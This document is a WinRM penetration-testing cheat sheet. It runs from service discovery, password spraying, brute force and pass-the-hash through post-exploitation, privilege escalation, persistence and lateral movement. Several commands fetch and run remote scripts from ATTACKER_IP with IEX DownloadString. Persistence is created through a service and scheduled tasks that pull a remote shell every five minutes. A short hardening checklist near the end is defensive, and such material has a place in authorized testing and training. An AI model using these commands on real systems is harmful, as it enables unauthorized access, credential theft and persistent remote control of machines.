Windows Remote Management

Environment Variables / Setup

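# Target / credential settings consumed by the commands on this page.
# IP and DOMAIN are plain values; USER shadows the login-name variable most
# shells already set — it is kept only because every command below uses $USER.
# The password is read with `read -rs` instead of `export PASS=...` so it does
# not land in shell history or in the environment listing of every child
# process (it will still appear in the argv of tools given `-p "$PASS"`).
export IP=
export DOMAIN=domain.local
export USER=username
read -rsp 'Password: ' PASS; echo
export PASS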

Phase 1: WinRM Service Discovery

Nmap WinRM Scripts

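# Version scan is enough to fingerprint WinRM: HTTP.sys answers with
# "Server: Microsoft-HTTPAPI/2.0". `winrm-info` is not in the stock NSE
# script set as far as I can tell, and nmap aborts the whole scan when a
# --script name does not resolve — only add it if `ls /usr/share/nmap/scripts`
# shows it installed.
nmap -sV -p 5985,5986 "$IP"
# nmap -sV -p 5985,5986 --script=winrm-info "$IP"   # only with the script present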

Service Detection

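# Port + service/version check
nmap -sV -p 5985,5986 "$IP"

# HTTPS listener: cipher suites and the bound certificate (CN/issuer often leak the hostname)
nmap -p 5986 --script ssl-enum-ciphers,ssl-cert "$IP"

# "Banner grabbing": WinRM is HTTP, so telnet shows nothing until a request is
# sent. An unauthenticated POST to /wsman typically returns 401 whose
# WWW-Authenticate header lists the enabled schemes (Negotiate, Basic, ...).
curl -si -X POST "http://$IP:5985/wsman"
curl -sik -X POST "https://$IP:5986/wsman"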

Phase 2: WinRM Enumeration

NetExec WinRM Enumeration

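# Unauthenticated probe: hostname / OS / listener banner only
netexec winrm "$IP"

# Null and guest sessions (expected to fail — WinRM has no anonymous mode;
# a success here means a real misconfiguration)
netexec winrm "$IP" -u '' -p ''
netexec winrm "$IP" -u 'guest' -p ''

# Authenticated check. Double quotes so the variables expand — the original
# single quotes sent the literal strings '$USER' and '$PASS'. A valid login
# that lacks WinRM rights (not in Administrators / Remote Management Users)
# is reported differently from a shell-capable one (netexec tags the latter
# "Pwn3d!", as far as I recall) — read the whole status line, not just [+].
netexec winrm "$IP" -u "$USER" -p "$PASS"
# Domain account (default is the target's own domain / local SAM)
netexec winrm "$IP" -d "$DOMAIN" -u "$USER" -p "$PASS"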

WinRM Configuration Check

# Dump the WinRM service configuration. These run ON the target (cmd or
# PowerShell, e.g. inside an evil-winrm shell) and need local admin rights.
winrm get winrm/config
# Listener details: bound address/port, transport (HTTP vs HTTPS) and certificate thumbprint
winrm get winrm/config/listener

Phase 3: WinRM Authentication Testing

Password Spraying

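# Check the lockout policy before spraying — every attempt counts toward it:
#   netexec smb "$IP" -u "$USER" -p "$PASS" --pass-pol   (or on the box: net accounts /domain)
# One password against many users; --continue-on-success keeps going after
# the first valid hit so every user is tested with this password.
netexec winrm "$IP" -u users.txt -p 'Password123!' --continue-on-success

# evil-winrm is an interactive client, not a sprayer: the first valid login
# drops you into a shell and the loop blocks there. Kept for completeness;
# prefer netexec above. (The original `-e` flag is --executables and requires
# a directory argument — it is not a standalone switch.)
while IFS= read -r user; do
  [[ -n "$user" ]] || continue
  echo "Testing: $user"
  evil-winrm -i "$IP" -u "$user" -p 'Password123!'
done < users.txt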

Brute Force Attack

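# Full user x password brute force = every combination. Confirm the lockout
# threshold and observation window first or the whole list gets locked out.
# hydra builds I know of ship no dedicated winrm module — check with
# `hydra -U winrm` and fall back to netexec if it is missing. -t 1 = one thread.
hydra -L users.txt -P passwords.txt -t 1 -V "$IP" winrm

# netexec tries every user with every password. Add --no-bruteforce to pair
# line N of users.txt with line N of passwords.txt (credential stuffing)
# instead of the full cross product.
netexec winrm "$IP" -u users.txt -p passwords.txt --continue-on-success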

Phase 4: WinRM Connection Methods

Evil-WinRM Connection

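# Username/password. Double quotes so $USER/$PASS expand — the original single
# quotes passed the literal text '$USER' / '$PASS' to evil-winrm.
evil-winrm -i "$IP" -u "$USER" -p "$PASS"

# Pass-the-Hash: -H takes the 32-hex NT hash only (no "LM:" prefix)
evil-winrm -i "$IP" -u "$USER" -H 'NTLM_HASH'

# Domain account as a UPN (still NTLM). For Kerberos, obtain a ticket first
# and use `-r "$DOMAIN"` (realm) instead of the UPN form.
evil-winrm -i "$IP" -u "$USER@$DOMAIN" -p "$PASS"

# HTTPS listener (5986). -S enables TLS; add -P <port> if it is non-default.
evil-winrm -i "$IP" -u "$USER" -p "$PASS" -S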

PowerShell Remoting

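# From a Windows attacking machine ($IP here is a PowerShell variable — set it
# first, e.g. $IP = '10.10.10.10'). Connecting by IP address rules out
# Kerberos, so WinRM falls back to NTLM and refuses unless the target is in
# the client's TrustedHosts list or the session uses HTTPS (-UseSSL).
Set-Item WSMan:\localhost\Client\TrustedHosts -Value $IP -Concatenate -Force
$cred = Get-Credential
Enter-PSSession -ComputerName $IP -Credential $cred

# Non-interactive credential object. The plaintext password ends up in the
# PowerShell history / transcript; prefer Get-Credential when a prompt is fine.
$pass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('username', $pass)
Enter-PSSession -ComputerName $IP -Credential $cred

# HTTPS listener (5986); skip CA/CN checks for the usual self-signed cert
Enter-PSSession -ComputerName $IP -Credential $cred -UseSSL -SessionOption (New-PSSessionOption -SkipCACheck -SkipCNCheck)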

Phase 5: WinRM Post-Exploitation

Initial Enumeration

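# System information (run inside the WinRM / evil-winrm shell)
systeminfo
whoami /all
net user
net localgroup administrators
# WinRM's default ACL also admits this group, which is how a non-admin account
# can land a shell here — worth knowing which other users share that path
net localgroup "Remote Management Users"

# Network information
ipconfig /all
netstat -an
arp -a

# Domain information (if domain joined)
nltest /domain_trusts
net group "Domain Admins" /domain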

File Transfer via WinRM

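# evil-winrm built-in commands (typed at the evil-winrm prompt): local path first, then remote
upload /local/path/file.exe C:\temp\file.exe

# Download files: remote path first, then local
download C:\temp\file.txt /local/path/file.txt

# Pull a file over HTTP from inside the session. The original
# DownloadString + IEX form does not transfer a file — it runs the fetched
# script in memory (see "PowerShell Execution"); DownloadFile / -OutFile write to disk.
(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP/file.exe', 'C:\temp\file.exe')
Invoke-WebRequest -Uri 'http://ATTACKER_IP/file.exe' -OutFile 'C:\temp\file.exe'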

PowerShell Execution

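# In-memory execution: fetch and run without writing to disk. On a patched
# host Defender/AMSI will likely flag PowerUp as-is; expect to need an AMSI
# bypass or an obfuscated copy.
IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/PowerUp.ps1')

# Load from a file already uploaded to the box
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# -enc expects base64 of UTF-16LE text, not plain UTF-8. Build it on Linux with:
#   echo -n 'whoami' | iconv -t UTF-16LE | base64 -w0
powershell -enc <base64_encoded_command>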

Phase 6: WinRM Privilege Escalation

Service Enumeration

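# Running services
Get-Service | Where-Object { $_.Status -eq 'Running' }

# ACLs on the service *registry keys* (a writable key lets you swap ImagePath).
# This is not the service object DACL; for that use accesschk.exe -uwcqv "Authenticated Users" *
# or sc.exe sdshow <service>, and check the binary's own file ACL.
Get-Acl -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\*' | Format-Table

# Unquoted service paths. The classic wmic/findstr one-liner is cmd.exe syntax
# (its `"""` escape is not valid in PowerShell, which is what an evil-winrm
# shell is) and wmic is being removed from current Windows 11 builds, so query
# CIM directly:
Get-CimInstance Win32_Service |
  Where-Object { $_.StartMode -eq 'Auto' -and $_.PathName -match ' ' -and $_.PathName -notmatch '^"' -and $_.PathName -notmatch '^[A-Za-z]:\\Windows' } |
  Select-Object Name, DisplayName, PathName, StartMode
# cmd.exe form, if you are in cmd (or wrap it in `cmd /c "..."`):
# wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """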

Registry Checks

# AlwaysInstallElevated: exploitable only when BOTH keys exist and are set to 1
# (then any .msi runs as SYSTEM: msiexec /quiet /qn /i evil.msi)
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

# Autoruns: check write access to the binaries these entries point at
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Phase 7: WinRM Persistence

Service Creation

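# Call sc.exe explicitly: inside PowerShell (which is what an evil-winrm shell
# is) the bare `sc` resolves to the Set-Content alias and no service is created.
# start= auto is what makes the service run at boot — without it the default is
# demand-start, which is no persistence at all. Because cmd.exe never answers
# the SCM, the start call typically fails with error 1053 after the payload has
# already been launched; that is expected.
sc.exe create evil binpath= "cmd.exe /c powershell -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" start= auto
sc.exe start evil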

Scheduled Task Creation

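# Runs every 5 minutes in the context of the current user
schtasks /create /tn "evil" /tr "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" /sc minute /mo 5
# Same task as SYSTEM (needs local admin); /f overwrites an existing task with that name
schtasks /create /tn "evil" /tr "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/shell.ps1')" /sc minute /mo 5 /ru SYSTEM /f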

Phase 8: WinRM Lateral Movement

Remote Command Execution

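# $cred is the credential object from the PowerShell Remoting section. Use a
# hostname so Kerberos is used; an IP address forces NTLM and needs TrustedHosts.
Invoke-Command -ComputerName TARGET -Credential $cred -ScriptBlock { whoami }

# -FilePath is a script on the *attacking* machine: its contents are shipped
# to TARGET and run there, nothing is written to the remote disk.
Invoke-Command -ComputerName TARGET -Credential $cred -FilePath C:\temp\script.ps1

# Fan out: one call, several hosts
Invoke-Command -ComputerName HOST1,HOST2 -Credential $cred -ScriptBlock { hostname }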

Credential Harvesting

# Credential Manager entries for the current user (a saved entry can be used
# with `runas /savecred /user:<user> cmd` without knowing the password)
cmdkey /list

# File-name hunt for anything with "password"/"cred" in the name, across the
# whole drive; slow and noisy on a big disk, errors are suppressed on purpose
Get-ChildItem -Path C:\ -Include *password*,*cred* -Recurse -Force -ErrorAction SilentlyContinue

WinRM Configuration Hardening Checks

Security Settings

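# Full dump (run on the target, needs local admin)
winrm get winrm/config

# Service-side auth schemes: Basic / Kerberos / Negotiate / Certificate / CredSSP.
# Basic = true only exposes cleartext together with AllowUnencrypted = true below
# (or when the HTTP listener is used without Negotiate message encryption).
winrm get winrm/config/service/auth

# AllowUnencrypted and the IPv4/IPv6 filters live here, not under /auth
winrm get winrm/config/service

# TrustedHosts is a *client* setting: it lists which remote hosts this box will
# hand NTLM credentials to, so a wildcard here weakens the client, not the server.
winrm get winrm/config/client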

Common Misconfigurations

  1. Basic authentication enabled (credentials travel in cleartext unless the HTTPS listener is used)
  2. AllowUnencrypted = true on the service (5985 traffic is normally protected by Negotiate/Kerberos message encryption; this lets clients turn that off)
  3. Weak authentication requirements (e.g. CredSSP enabled, which hands the target your plaintext credential)
  4. Overly permissive TrustedHosts on clients (a client-side setting: a wildcard makes the client send credentials to any host)
  5. Weak, reused or shared local Administrator credentials (WinRM has no credentials of its own; it rides on Windows accounts)

WinRM Attack Checklist

  • Service discovery and version identification
  • Authentication testing (anonymous, guest)
  • Password spraying with common passwords
  • Brute force attacks (only if other methods fail, and only after checking the lockout policy)
  • Connection establishment via various methods
  • Initial enumeration of target system
  • Privilege escalation vector identification
  • Persistence establishment
  • Lateral movement opportunities

Tools Summary

# Enumeration
nmap, netexec

# Connection & Exploitation
evil-winrm, PowerShell remoting

# Post-exploitation
PowerUp.ps1, WinPEAS, Mimikatz (Mimikatz needs admin/SYSTEM and is widely signatured — expect Defender/AMSI to block it unmodified)

Common WinRM Ports

5985/tcp  - WinRM HTTP
5986/tcp  - WinRM HTTPS

Next Steps

Once WinRM access is gained:

  1. Enumerate system for privilege escalation
  2. Harvest credentials from memory/files
  3. Establish persistence mechanisms
  4. Map network for lateral movement
  5. Escalate privileges to SYSTEM/Administrator

Resources